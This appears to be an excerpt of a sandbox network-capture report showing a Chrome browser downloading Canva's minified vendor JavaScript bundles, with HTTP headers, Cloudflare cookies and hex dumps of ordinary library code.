                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1192INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 205707
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79f75df80f53-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 204142
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "2a1f2d039cb106b389c63aa919cb4db8"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:10 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 17 Dec 2024 00:45:39 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 18 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: zzuEIOA6Bozs+UX2Xuq7dna9md8DFUTMCTkaCaCy6AupAMxdNYGASWVCw0+XE1T/8xFL/XTc8rg=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: TCYTZ4E4P5GS2R1B
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: b4znDo1h0h06t7QZ4ai4rGRO41dp.nw4
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC346INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 6f 61 43 45 76 37 71 75 42 69 76 42 4f 77 57 54 30 71 72 6e 6f 6c 36 69 43 46 31 46 71 74 74 79 43 7a 66 48 46 66 44 70 63 59 37 52 46 70 39 78 77 4e 48 46 65 7a 54 53 45 25 32 42 6d 33 67 74 30 4d 4d 57 31 48 71 64 7a 48 53 58 54 5a 79 4a 66 53 7a 7a 5a 53 4f 4c 6f 62 44 71 79 6c 31 68 5a 33 4d 35 4e 54 4a 36 71 64 4f 33 59 77 74 69 59 69 54 6e 45 49 48 74 62 64 6a 53 43 43 30 43 47 59 4e 70 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oaCEv7quBivBOwWT0qrnol6iCF1FqttyCzfHFfDpcY7RFp9xwNHFezTSE%2Bm3gt0MMW1HqdzHSXTZyJfSzzZSOLobDqyl1hZ3M5NTJ6qdO3YwtiYiTnEIHtbdjSCC0CGYNpk%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 37 36 64 38 62 30 36 36 31 32 62 39 34 35 38 35 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 36 35 33 5d 2c 7b 32 38 36 34 34 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 51 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 72 3d 6e 28 32 33 39 34 31 32 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 6e 3d 65 2e
                                                                                                                                                                                                                                                    Data Ascii: /*! For license information please see 76d8b06612b94585.vendor.js.LICENSE.txt */"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{286447:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(239412);function a(e){var t=e.children,n=e.
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 2e 20 54 68 65 20 6f 62 73 65 72 76 65 72 20 61 6c 72 65 61 64 79 20 61 70 70 6c 69 65 73 20 27 52 65 61 63 74 2e 6d 65 6d 6f 27 20 66 6f 72 20 79 6f 75 2e 22 29 3b 69 66 28 28 30 2c 6f 2e 46 29 28 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 6f 72 77 61 72 64 52 65 66 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 26 26 6e 2c 61 3d 65 2c 75 3d 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 65 2e 6e 61 6d 65 3b 69 66 28 63 26 26 65 2e 24 24 74 79 70 65 6f 66 3d 3d 3d 63 26 26 28 72 3d 21 30 2c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 28 61 3d 65 2e 72 65 6e 64 65 72 29 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 5b 6d 6f 62 78 2d 72 65 61 63 74 2d 6c
                                                                                                                                                                                                                                                    Data Ascii: . The observer already applies 'React.memo' for you.");if((0,o.F)())return e;var r=null!==(n=null==t?void 0:t.forwardRef)&&void 0!==n&&n,a=e,u=e.displayName||e.name;if(c&&e.$$typeof===c&&(r=!0,"function"!=typeof(a=e.render)))throw new Error("[mobx-react-l
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 65 2e 72 65 61 63 74 69 6f 6e 3d 6e 65 77 20 72 2e 6c 65 28 22 6f 62 73 65 72 76 65 72 22 2e 63 6f 6e 63 61 74 28 65 2e 6e 61 6d 65 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 65 2e 73 74 61 74 65 56 65 72 73 69 6f 6e 3d 53 79 6d 62 6f 6c 28 29 2c 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 6f 6e 53 74 6f 72 65 43 68 61 6e 67 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 63 61 6c 6c 28 65 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 22 6f 62 73 65 72 76 65 64 22 29 2c 28 30 2c 6f 2e 46 29 28 29 29 72 65 74 75 72 6e 20 65 28 29 3b 76 61 72 20 6e 3d 61 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 3b 69 66 28 21 6e 2e 63 75 72 72 65 6e
                                                                                                                                                                                                                                                    Data Ascii: function s(e){e.reaction=new r.le("observer".concat(e.name),(function(){var t;e.stateVersion=Symbol(),null===(t=e.onStoreChange)||void 0===t||t.call(e)}))}function c(e,t){if(void 0===t&&(t="observed"),(0,o.F)())return e();var n=a.useRef(null);if(!n.curren
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 64 20 30 3b 76 61 72 20 6e 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 2c 61 29 7b 6e 2d 72 2e 72 65 67 69 73 74 65 72 65 64 41 74 3e 3d 65 26 26 28 74 2e 66 69 6e 61 6c 69 7a 65 28 72 2e 76 61 6c 75 65 29 2c 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 64 65 6c 65 74 65 28 61 29 29 7d 29 29 2c 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 73 69 7a 65 3e 30 26 26 74 2e 73 63 68 65 64 75 6c 65 53 77 65 65 70 28 29 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 68 69 73 2c 22 66 69 6e 61 6c 69 7a 65 41 6c 6c 49 6d 6d 65 64 69 61 74 65 6c 79 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c
                                                                                                                                                                                                                                                    Data Ascii: d 0;var n=Date.now();t.registrations.forEach((function(r,a){n-r.registeredAt>=e&&(t.finalize(r.value),t.registrations.delete(a))})),t.registrations.size>0&&t.scheduleSweep()}}),Object.defineProperty(this,"finalizeAllImmediately",{enumerable:!0,configurabl
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 65 28 29 2c 65 2e 72 65 61 63 74 69 6f 6e 3d 6e 75 6c 6c 7d 29 29 7d 2c 32 32 39 39 30 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 65 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 72 3d 6e 28 34 32 37 38 32 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 47 66 29 28 65 29 7d 7d 2c 38 39 38 37 39 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 6d 3a 28 29 3d 3e 72 2e 75 6e 73 74 61 62 6c 65 5f 62 61 74 63 68 65 64 55 70 64 61 74 65 73 7d 29 3b 76 61 72 20 72 3d 6e 28 32 30 34 33 35 38 29 7d 2c 34 32 37 38 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 24 24 3a 28 29 3d 3e 4b 65 2c 45 48 3a 28 29 3d 3e 48 74 2c 45 69 3a 28 29 3d 3e 71 6e 2c 46 6c 3a 28 29 3d 3e 56 65 2c 47 66 3a 28 29 3d 3e 72 6e 2c
                                                                                                                                                                                                                                                    Data Ascii: e(),e.reaction=null}))},229907:(e,t,n)=>{n.d(t,{e:()=>a});var r=n(42782);function a(e){return(0,r.Gf)(e)}},898793:(e,t,n)=>{n.d(t,{m:()=>r.unstable_batchedUpdates});var r=n(204358)},42782:(e,t,n)=>{n.d(t,{$$:()=>Ke,EH:()=>Ht,Ei:()=>qn,Fl:()=>Ve,Gf:()=>rn,
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 29 7d 7d 76 61 72 20 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 65 29 7b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 63 61 73 65 22 73 79 6d 62 6f 6c 22 3a 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 69 66 28 21 62 28 65 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74
                                                                                                                                                                                                                                                    Data Ascii: )}}var g=function(){};function m(e){return"function"==typeof e}function y(e){switch(typeof e){case"string":case"symbol":case"number":return!0}return!1}function b(e){return null!==e&&"object"==typeof e}function _(e){if(!b(e))return!1;var t=Object.getProtot
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 6e 5d 3d 6c 28 65 2c 6e 29 7d 29 29 2c 74 7d 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 28 65 26 74 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3f 65 7c 3d 74 3a 65 26 3d 7e 74 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 2c 74 29 7b 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 3e 65 2e 6c 65 6e 67 74 68 29 26 26 28 74 3d 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 41 72 72 61 79 28 74 29 3b 6e 3c 74 3b 6e 2b 2b 29 72 5b 6e 5d 3d 65 5b 6e 5d 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65
                                                                                                                                                                                                                                                    Data Ascii: n]=l(e,n)})),t};function L(e,t){return!!(e&t)}function R(e,t,n){return n?e|=t:e&=~t,e}function z(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=Array(t);n<t;n++)r[n]=e[n];return r}function M(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 56 28 65 2c 74 29 7b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 2c 46 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 46 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 2c 65 7d 2c 46 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                                                                                                                                                                                                                    Data Ascii: ll,arguments)}function V(e,t){e.prototype=Object.create(t.prototype),e.prototype.constructor=e,F(e,t)}function F(e,t){return F=Object.setPrototypeOf?Object.setPrototypeOf.bind():function(e,t){return e.__proto__=t,e},F(e,t)}function U(e){var t=function(e,t
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 29 2c 45 74 28 74 68 69 73 29 2c 53 74 28 29 7d 2c 74 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 61 6d 65 5f 7d 2c 44 28 65 2c 5b 7b 6b 65 79 3a 22 69 73 42 65 69 6e 67 4f 62 73 65 72 76 65 64 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 28 74 68 69 73 2e 66 6c 61 67 73 5f 2c 65 2e 69 73 42 65 69 6e 67 4f 62 73 65 72 76 65 64 4d 61 73 6b 5f 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 66 6c 61 67 73 5f 3d 52 28 74 68 69 73 2e 66 6c 61 67 73 5f 2c 65 2e 69 73 42 65 69 6e 67 4f 62 73 65 72 76 65 64 4d 61 73 6b 5f 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 69 73 50 65 6e 64 69 6e 67 55 6e 6f 62 73 65 72 76 61 74 69 6f 6e 22 2c 67 65 74 3a 66 75 6e 63
                                                                                                                                                                                                                                                    Data Ascii: ),Et(this),St()},t.toString=function(){return this.name_},D(e,[{key:"isBeingObserved",get:function(){return L(this.flags_,e.isBeingObservedMask_)},set:function(t){this.flags_=R(this.flags_,e.isBeingObservedMask_,t)}},{key:"isPendingUnobservation",get:func


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    16192.168.2.449758104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC622OUTGET /web/a539f22cb4b4cc9e.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1191INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 370795
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79f93ce642de-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 64957
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "74c9deb0cfd613ebf0b30cb5899fbc72"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:10 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:54 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: hmfXTfyBEsOeflTOUdU1Al3CaXJNTAzHhYpG16WTiXe9S0uOFiEHGd1bS5Qzwgej6/Zqpv2eT58=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: 12FDFN5H1VJB9V5T
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: uYT2hMkwD6fYplh2npPq7VkieXzg0qpW
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 32 63 6b 77 63 33 41 62 25 32 42 36 31 41 35 67 43 48 46 59 45 4e 45 34 34 73 31 4e 5a 73 25 32 42 68 6f 38 33 33 6e 66 49 50 38 71 4a 6f 59 38 44 4e 74 37 74 79 38 44 48 5a 6b 6f 58 54 78 4e 76 70 5a 5a 43 48 36 6c 6f 46 44 62 4a 55 69 4b 77 6a 33 62 53 7a 77 37 6c 33 72 58 79 6a 52 69 6e 25 32 46 25 32 42 75 6e 44 64 53 36 49 65 38 62 79 6a 77 49 45 52 37 41 75 52 7a 70 4a 4d 54 79 72 47 55 74 51 30 71 54 69 63 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ckwc3Ab%2B61A5gCHFYENE44s1NZs%2Bho833nfIP8qJoY8DNt7ty8DHZkoXTxNvpZZCH6loFDbJUiKwj3bSzw7l3rXyjRin%2F%2BunDdS6Ie8byjwIER7AuRzpJMTyrGUtQ0qTic%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 61 35 33 39 66 32 32 63 62 34 62 34 63 63 39 65 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 34 33 36 5d 2c 7b 39 36 38 3a 74 3d 3e 7b 76 61 72 20 65 3b 77 69 6e 64 6f 77 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78
                                                                                                                                                                                                                                                    Data Ascii: /*! For license information please see a539f22cb4b4cc9e.vendor.js.LICENSE.txt */(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{968:t=>{var e;window,e=function(){return function(t){var e={};function n(r){if(e[r])return e[r].ex
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 29 2c 64 3d 6e 28 32 35 29 2c 79 3d 6e 28 31 31 29 2c 76 3d 6e 28 32 30 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 74 29 7b 72 65 74 75 72 6e 20 62 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 74 7d 2c 62 28 74 29
                                                                                                                                                                                                                                                    Data Ascii: ),d=n(25),y=n(11),v=n(20);function b(t){return b="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},b(t)
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 65 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2e 6b 65 79 2c 72 29 7d 7d 76 61 72 20 45 3d 4f 62 6a 65 63 74 28 79 2e 61 29 28 22 71 75 69 6c 6c 22 29 2c 4f 3d 6e 65 77 20 63 2e 52 65 67 69 73 74 72 79 3b 63 2e 50 61 72 65 6e 74 42 6c 6f 74 2e 75 69 43 6c 61 73 73 3d 22 71 6c 2d 75 69 22 3b 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                                                    Data Ascii: gth;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}var E=Object(y.a)("quill"),O=new c.Registry;c.ParentBlot.uiClass="ql-ui";var x=function(){function t(e){var n=this,r=argumen
